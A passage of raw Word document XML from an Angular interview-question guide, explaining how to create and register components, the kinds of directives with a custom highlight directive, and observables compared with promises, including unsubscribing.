        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9DB451"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also use shorthand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501B53A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 c user-profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436416EA"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4BAA0C">
          <v:rect id="_x0000_i3777" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CFD729"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nually Creating a Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E3D0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 folder and component files</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF7F634"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r-profile.component.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD1FBB"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html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A6FFB5"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css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAC94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e the Component</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in user-profile.component.ts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBB7382"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 from '@angular/core';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4AFA92" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CEE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367BA3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0423E2C"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profile',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857E52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profile.component.html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF6B8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profile.component.css']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CCE9C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B30E83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ProfileComponent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4A0C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 'John Doe';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BE43C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3B85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gister the component</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the app.module.ts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F40A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rProfileComponent } from './user-profile/user-profile.component';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300FC4DF" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CEE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68006B1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3182CA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0176462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rProfileComponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316E42A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DFEC2A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7E4D6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456D6594"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75AF0">
          <v:rect id="_x0000_i3778" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DEB8D5"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the component in HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B65839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app.component.html or any other parent component:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10762B40" w14:textId="77777777" w:rsidR="00001CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00001CEE"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lt;app-user-profile&gt;&lt;/app-user-profile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6411A8" w14:textId="7F531587"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779" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E8863" w14:textId="5C68AD52" w:rsidR="00A976FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00B126AD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="927" w:name="_Toc197868141"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain angular directives</w:t>
      </w:r>
      <w:r w:rsidR="00A976FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="927"/>
    </w:p>
    <w:p w14:paraId="0AF49E82" w14:textId="0B83D50B" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8"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rectives – Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571972C"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r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Angular are special instructions in the DOM (Document Object Model) that tell Angular how to render or modify elements, components, or behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C16ACB"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8BA41A">
          <v:rect id="_x0000_i3780" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="042AD89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es of Directives in Angular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC419C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w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>three</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> main types of directives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501EE4D4"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7EE5">
          <v:rect id="_x0000_i3781" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D6F8F"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 Directives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BED92E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ition:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A component is technically a directive with a template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142A36A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r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every component you create with @Component is a directive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327EC908"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4F30C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3B2507C2"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16A7790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1DB4D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452A8BF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7DE00">
          <v:rect id="_x0000_i3782" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C480CD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ructural Directives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4321A85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structure</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the DOM (i.e., add/remove elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D42E9D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0B11C2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If: Conditionally includes a template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43677F48"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For: Repeats a template for each item in a list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748ACB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witch: Switch-case rendering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB60E2A"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624A1D4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LoggedIn"&gt;Welcome back!&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5051F33A" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72ECC80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00C23A6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li *ngFor="let user of users"&gt;{{ user.name }}&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646C86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5482C221"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9C726D">
          <v:rect id="_x0000_i3783" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="375E3F76"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ttribute Directives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B552A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appearance or behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0831BBA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76F79781"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Class: Add/remove CSS classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137C1A6A"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tyle: Dynamically set styles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0E1360"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 directives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A0C91"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4A90BD1D"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Class]="{'active': isActive}"&gt;Active Block&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB3E258" w14:textId="77777777" w:rsidR="00291DE8" w:rsidRPr="003C7C02" w:rsidRDefault="00291DE8" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FF178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Style]="{'color': isError ? 'red' : 'green'}"&gt;Status&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D36231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DEA3EE">
          <v:rect id="_x0000_i3784" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ECA755"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ustom Attribute Directive Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DC456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irective({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5EDB2F"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Highlight]'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B42F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F159E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HighlightDirective {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B60371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el: ElementRef) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252D9AB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l.nativeElement.style.backgroundColor = 'yellow';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6195048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CDC2CD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B07CD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 it like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB0E917"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 appHighlight&gt;This text will have a yellow background&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070BBD4A" w14:textId="2C570BE4"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785" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E0A57D" w14:textId="2BF75065" w:rsidR="00A976FD" w:rsidRPr="00CE4B95" w:rsidRDefault="005B610E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="928" w:name="_Toc197868142"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are observables in angular</w:t>
      </w:r>
      <w:r w:rsidR="00A976FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="928"/>
    </w:p>
    <w:p w14:paraId="3EC09512" w14:textId="5F52914D" w:rsidR="00AC716D" w:rsidRPr="003C7C02" w:rsidRDefault="00AC716D"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Are Observables in Angular?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D23B68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Observables</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a key part of Angular's </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model. They are used to </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handle asynchronous data streams</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1DE42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 requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC5C1B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 input events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA49F3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imers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427D84E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ebSocket connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6460966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uses </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RxJS (Reactive Extensions for JavaScript)</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to provide observables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6876598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C4D541">
          <v:rect id="_x0000_i3786" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F56BDFC"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re Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC329C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 </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Observable</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> emits data over time, and you can </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribe</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to it to react to the emitted data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2326070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observable = new Observable(observer =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E8E560"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Hello');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B4461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World');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF13B9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486FC7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9907CC8" w14:textId="77777777" w:rsidR="00AC716D" w:rsidRPr="003C7C02" w:rsidRDefault="00AC716D" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470FE1C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bservable.subscribe(val =&gt; console.log(val));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4755FA1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486934C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llo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A950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orld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D3119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6045D">
          <v:rect id="_x0000_i3787" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3957B477"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mmon Use Case – HTTP Calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B2F97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http.get&lt;Employee[]&gt;('api/employees')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1118577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ubscribe(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF5966"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2C75859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93665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get() returns an Observable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CA32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subscribe() gets the response when ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFCA3F6"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573F">
          <v:rect id="_x0000_i3788" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2AE896"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774"/>
        <w:gridCol w:w="1514"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="6B39024A" w14:textId="77777777" w:rsidTr="00AC716D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B29A2A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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4750AFB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Observable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D70CB6D"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romise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="628362CF" w14:textId="77777777" w:rsidTr="00AC716D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0519CE1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ultiple values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A040FE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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18E3496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0E35D998" w14:textId="77777777" w:rsidTr="00AC716D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6572851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azy execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7569117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runs on subscribe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AD0901F"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r>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="60CBA095" w14:textId="77777777" w:rsidTr="00AC716D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42E9580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celable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CE242F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unsubscribe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F30737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3D7A7F58" w14:textId="77777777" w:rsidTr="00AC716D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EDC5EF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perators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="673477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Many via RxJS (map, filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62D5C1D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Very limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F7420D2"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A0891">
          <v:rect id="_x0000_i3789" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="451BE79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nsubscribing from Observables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8F5FE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avoid memory leaks, unsubscribe when you're done:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495EB33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Destroy() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D91A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subscription.unsubscribe();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1099A39D"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C6E4E4A" w14:textId="76E0742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790" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F43CD4" w14:textId="789C3E46" w:rsidR="00A976FD" w:rsidRPr="00CE4B95" w:rsidRDefault="003C680B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
